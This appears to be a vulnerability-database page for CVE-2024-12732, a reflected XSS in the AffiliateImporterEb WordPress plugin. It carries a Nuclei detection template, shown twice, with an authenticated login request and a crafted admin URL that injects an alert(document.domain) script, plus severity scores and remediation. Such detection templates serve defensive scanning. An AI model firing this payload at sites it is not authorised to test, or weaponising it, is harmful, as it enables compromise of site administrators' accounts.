AffiliateImporterEb <= 1.0.6 - Reflected XSS

CVE-2024-12732

Verified

Description

AffiliateImporterEb WordPress plugin through 1.0.6 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.

Severity

Medium

CVSS Score

6.1

Exploit Probability

Affected Product

affiliateimportereb

Published Date

February 7, 2026

Template Author

sourabh-sahu

CVE-2024-12732.yaml

id: CVE-2024-12732

info:
  name: AffiliateImporterEb <= 1.0.6 - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    AffiliateImporterEb WordPress plugin through 1.0.6 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account compromise or unauthorized actions.
  remediation: |
    Update to the latest version beyond 1.0.6.
  reference:
    - https://wpscan.com/vulnerability/bc46edd8-8d77-4567-873b-e9e90a01adcf/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12732
    cwe-id: CWE-79
    epss-score: 0.00199
    epss-percentile: 0.41769
    cpe: cpe:2.3:a:cr1000:affiliateimportereb:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cr1000
    product: affiliateimportereb
  tags: cve,cve2024,cr1000,wp-scan,wordpress,wp-plugin,affiliateimportereb,authenticated,xss,wp

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=ebdn-settings&module=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "><script>alert(document.domain)</script>","affiliateimportereb")
        condition: and
# digest: 4b0a0048304602210084937425e6636a1f3bae62fc4b47023fa543a6ef8db655789a42c750e5afeb5d022100d86338e50f3c17a6ffb89ff41ed647e166246c57d868861ae140a648ccb4a67f:922c64590222798bb761d5b6d8e72950

6.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2024-12732

CWE ID:

cwe-79

References

https://wpscan.com/vulnerability/bc46edd8-8d77-4567-873b-e9e90a01adcf/

Remediation Steps

Update to the latest version beyond 1.0.6.

id: CVE-2024-12732

info:
  name: AffiliateImporterEb <= 1.0.6 - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    AffiliateImporterEb WordPress plugin through 1.0.6 contains a reflected XSS caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account compromise or unauthorized actions.
  remediation: |
    Update to the latest version beyond 1.0.6.
  reference:
    - https://wpscan.com/vulnerability/bc46edd8-8d77-4567-873b-e9e90a01adcf/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12732
    cwe-id: CWE-79
    epss-score: 0.00199
    epss-percentile: 0.41769
    cpe: cpe:2.3:a:cr1000:affiliateimportereb:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cr1000
    product: affiliateimportereb
  tags: cve,cve2024,cr1000,wp-scan,wordpress,wp-plugin,affiliateimportereb,authenticated,xss,wp

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=ebdn-settings&module=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "><script>alert(document.domain)</script>","affiliateimportereb")
        condition: and
# digest: 4b0a0048304602210084937425e6636a1f3bae62fc4b47023fa543a6ef8db655789a42c750e5afeb5d022100d86338e50f3c17a6ffb89ff41ed647e166246c57d868861ae140a648ccb4a67f:922c64590222798bb761d5b6d8e72950

AffiliateImporterEb <= 1.0.6 - Reflected XSS

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

AffiliateImporterEb <= 1.0.6 - Reflected XSS

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps